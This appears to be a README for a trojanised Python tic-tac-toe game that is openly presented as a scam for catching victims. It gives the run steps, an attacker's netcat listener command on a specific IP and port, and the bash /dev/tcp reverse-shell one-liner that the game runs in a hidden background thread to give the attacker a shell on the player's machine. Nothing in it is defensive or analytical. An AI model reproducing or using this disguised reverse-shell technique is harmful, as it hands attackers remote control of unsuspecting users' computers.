Scam attack that uses Tic tac toe game to catch victims
- Clone the repository
- navigate to directory
python-game-scam
- run
python3 ticatactoe.py
(victim is caught 😋)
- The hacker opens up a port at
82.165.97.169
for the victim to connect via port 2004
$ nc -lnvp 2004 -s 82.165.97.169
The victim thinks that he/she is just playing a game.
When the victim opens up the game, a thread is created the in the background to run a bash script that connects to the server hence the victim is hacked.
The script to run in background is
$ /bin/bash -i > /dev/tcp/82.165.97.169/2004 0<&1 2>&1
hirwablessing7@gmail.com A.K.A blessingartcreator